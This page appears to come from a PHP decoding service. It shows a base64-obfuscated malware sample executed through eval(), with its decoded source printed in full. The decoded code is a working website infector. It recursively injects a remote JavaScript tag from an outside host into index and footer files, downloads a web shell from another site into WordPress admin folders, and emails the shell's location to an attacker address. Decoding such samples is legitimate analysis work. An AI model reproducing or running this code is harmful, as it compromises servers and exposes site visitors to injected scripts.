Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $r = "c2V0X3RpbWVfbGltaXQoMCk7DQppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnLTEnKTsNCkBlcnJvc..
Decoded Output download
set_time_limit(0);
ini_set('memory_limit', '-1');
@error_reporting(0);
function ScanFolders($thefolder) {
$files = @scandir($thefolder);
if ($files) {
foreach($files as $nfile) {
if ($nfile != '.' && $nfile != '..') {
$lookat = $thefolder.'/'.$nfile;
$lookat = str_replace('//', '/', $lookat);
if (is_dir($lookat)) {
if (strpos($lookat, 'wp-admin/includes')) {
RetrieveShell($lookat);
}
ScanFolders($lookat);
}
if ($nfile == 'index.php' || $nfile == 'index.html' || $nfile == 'footer.php') {
InfectFile($lookat);
}
}
}
}
}
function InfectFile($file) {
$jstoinject = '<script type="text/javascript" src="http://earcuff.nl/js/jqueryinit.js"></script>';
$oldfile = @file_get_contents($file);
if ($oldfile) {
if (!strpos($oldfile, $jstoinject)) {
$flag = 0;
if (strpos($oldfile, '</body>')) {
$oldfile = str_replace('</body>', $jstoinject."
".'</body>', $oldfile);
$flag = 1;
}
if (strpos($oldfile, '</BODY>')) {
$oldfile = str_replace('</BODY>', $jstoinject."
".'</BODY>', $oldfile);
$flag = 1;
}
if ($flag == 1) {
@file_put_contents($file, $oldfile);
}
}
}
}
function RetrieveShell ($myfolder) {
$myshell = file_get_contents('http://independencestudio.com/wp-content/uploads/2011/09/i.txt');
file_put_contents($myfolder.'/a.php', $myshell);
if (file_exists($myfolder.'/a.php')) {
mail('[email protected]',$_SERVER["SERVER_NAME"].' status', 'Data from site'.$_SERVER["SERVER_NAME"]."
".'Data from site: '.$myfolder.'/a.php', 'From: no_reply@'.$_SERVER["SERVER_NAME"]);
}
}
if (!is_dir('cache')) {
@mkdir('cache', 0777);
}
if (!file_exists('cache/session.pss')) {
$folder = $_SERVER['DOCUMENT_ROOT'];
$listoffolders = explode('/', $folder);
$actualfolder = '';
if (count($listoffolders) > 0) {
for($i = 0; $i < count($listoffolders) - 1; $i++) {
$actualfolder .= $listoffolders[$i].'/';
}
}
if ($actualfolder) {
ScanFolders(str_replace('//', '/', $actualfolder));
}
file_put_contents('cache/session.pss', base64_encode(time()));
}Did this file decode correctly?
Original Code
<?php
$r = "c2V0X3RpbWVfbGltaXQoMCk7DQppbmlfc2V0KCdtZW1vcnlfbGltaXQnLCAnLTEnKTsNCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQoNCmZ1bmN0aW9uIFNjYW5Gb2xkZXJzKCR0aGVmb2xkZXIpIHsNCiAgICAkZmlsZXMgPSBAc2NhbmRpcigkdGhlZm9sZGVyKTsNCiAgICBpZiAoJGZpbGVzKSB7DQogICAgICAgIGZvcmVhY2goJGZpbGVzIGFzICRuZmlsZSkgew0KICAgICAgICAgICAgaWYgKCRuZmlsZSAhPSAnLicgJiYgJG5maWxlICE9ICcuLicpIHsNCiAgICAgICAgICAgICAgICAkbG9va2F0ID0gJHRoZWZvbGRlci4nLycuJG5maWxlOw0KICAgICAgICAgICAgICAgICRsb29rYXQgPSBzdHJfcmVwbGFjZSgnLy8nLCAnLycsICRsb29rYXQpOw0KICAgICAgICAgICAgICAgIGlmIChpc19kaXIoJGxvb2thdCkpIHsNCiAgICAgICAgICAgICAgICAgICAgaWYgKHN0cnBvcygkbG9va2F0LCAnd3AtYWRtaW4vaW5jbHVkZXMnKSkgew0KICAgICAgICAgICAgICAgICAgICAgICAgUmV0cmlldmVTaGVsbCgkbG9va2F0KTsNCiAgICAgICAgICAgICAgICAgICAgfQ0KICAgICAgICAgICAgICAgICAgICBTY2FuRm9sZGVycygkbG9va2F0KTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgaWYgKCRuZmlsZSA9PSAnaW5kZXgucGhwJyB8fCAkbmZpbGUgPT0gJ2luZGV4Lmh0bWwnIHx8ICRuZmlsZSA9PSAnZm9vdGVyLnBocCcpIHsNCiAgICAgICAgICAgICAgICAgICAgSW5mZWN0RmlsZSgkbG9va2F0KTsNCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQogICAgICAgIH0NCiAgICB9DQp9DQoNCmZ1bmN0aW9uIEluZmVjdEZpbGUoJGZpbGUpIHsNCiAgICAkanN0b2luamVjdCA9ICc8c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCIgc3JjPSJodHRwOi8vZWFyY3VmZi5ubC9qcy9qcXVlcnlpbml0LmpzIj48L3NjcmlwdD4nOw0KICAgICRvbGRmaWxlID0gQGZpbGVfZ2V0X2NvbnRlbnRzKCRmaWxlKTsNCiAgICBpZiAoJG9sZGZpbGUpIHsNCiAgICAgICAgaWYgKCFzdHJwb3MoJG9sZGZpbGUsICRqc3RvaW5qZWN0KSkgew0KICAgICAgICAgICAgJGZsYWcgPSAwOw0KICAgICAgICAgICAgaWYgKHN0cnBvcygkb2xkZmlsZSwgJzwvYm9keT4nKSkgew0KICAgICAgICAgICAgICAgICRvbGRmaWxlID0gc3RyX3JlcGxhY2UoJzwvYm9keT4nLCAkanN0b2luamVjdC4iXG4iLic8L2JvZHk+JywgJG9sZGZpbGUpOw0KICAgICAgICAgICAgICAgICRmbGFnID0gMTsNCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIGlmIChzdHJwb3MoJG9sZGZpbGUsICc8L0JPRFk+JykpIHsNCiAgICAgICAgICAgICAgICAkb2xkZmlsZSA9IHN0cl9yZXBsYWNlKCc8L0JPRFk+JywgJGpzdG9pbmplY3QuIlxuIi4nPC9CT0RZPicsICRvbGRmaWxlKTsNCiAgICAgICAgICAgICAgICAkZmxhZyA9IDE7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBpZiAoJGZsYWcgPT0gMSkgew0KICAgICAgICAgICAgICAgIEBmaWxlX3B1dF9jb250ZW50cygkZmlsZSwgJG9sZGZpbGUpOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgfQ0KfQ0KZnVuY3Rpb24gUmV0cmlldmVTaGVsbCAoJG15Zm9sZGVyKSB7DQogICAgJG15c2hlbGwgPSBmaWxlX2dldF9jb250ZW50cygnaHR0cDovL2luZGVwZW5kZW5jZXN0dWRpby5jb20vd3AtY29udGVudC91cGxvYWRzLzIwMTEvMDkvaS50eHQnKTsNCiAgICBmaWxlX3B1dF9jb250ZW50cygkbXlmb2xkZXIuJy9hLnBocCcsICRteXNoZWxsKTsNCiAgICBpZiAoZmlsZV9leGlzdHMoJG15Zm9sZGVyLicvYS5waHAnKSkgew0KICAgICAgICBtYWlsKCdNZWxpbmRhRGVuaGFtNzE1MEBob3RtYWlsLmNvbScsJF9TRVJWRVJbIlNFUlZFUl9OQU1FIl0uJyBzdGF0dXMnLCAnRGF0YSBmcm9tIHNpdGUnLiRfU0VSVkVSWyJTRVJWRVJfTkFNRSJdLiJcclxuIi4nRGF0YSBmcm9tIHNpdGU6ICcuJG15Zm9sZGVyLicvYS5waHAnLCAnRnJvbTogbm9fcmVwbHlAJy4kX1NFUlZFUlsiU0VSVkVSX05BTUUiXSk7DQogICAgfQ0KfQ0KaWYgKCFpc19kaXIoJ2NhY2hlJykpIHsNCiAgICBAbWtkaXIoJ2NhY2hlJywgMDc3Nyk7DQp9DQppZiAoIWZpbGVfZXhpc3RzKCdjYWNoZS9zZXNzaW9uLnBzcycpKSB7DQogICAgJGZvbGRlciA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ107DQogICAgJGxpc3RvZmZvbGRlcnMgPSBleHBsb2RlKCcvJywgJGZvbGRlcik7DQogICAgJGFjdHVhbGZvbGRlciA9ICcnOw0KICAgIGlmIChjb3VudCgkbGlzdG9mZm9sZGVycykgPiAwKSB7DQogICAgICAgIGZvcigkaSA9IDA7ICRpIDwgY291bnQoJGxpc3RvZmZvbGRlcnMpIC0gMTsgJGkrKykgew0KICAgICAgICAgICAgJGFjdHVhbGZvbGRlciAuPSAkbGlzdG9mZm9sZGVyc1skaV0uJy8nOw0KICAgICAgICB9DQogICAgfQ0KICAgIGlmICgkYWN0dWFsZm9sZGVyKSB7DQogICAgICAgIFNjYW5Gb2xkZXJzKHN0cl9yZXBsYWNlKCcvLycsICcvJywgJGFjdHVhbGZvbGRlcikpOw0KICAgIH0NCiAgICBmaWxlX3B1dF9jb250ZW50cygnY2FjaGUvc2Vzc2lvbi5wc3MnLCBiYXNlNjRfZW5jb2RlKHRpbWUoKSkpOw0KfQ==";
eval(base64_decode($r));
?>Function Calls
| base64_decode | 1 |
Stats
| MD5 | 57d08c22416bb7286fd2e555bdd2fb80 |
| Eval Count | 1 |
| Decode Time | 94 ms |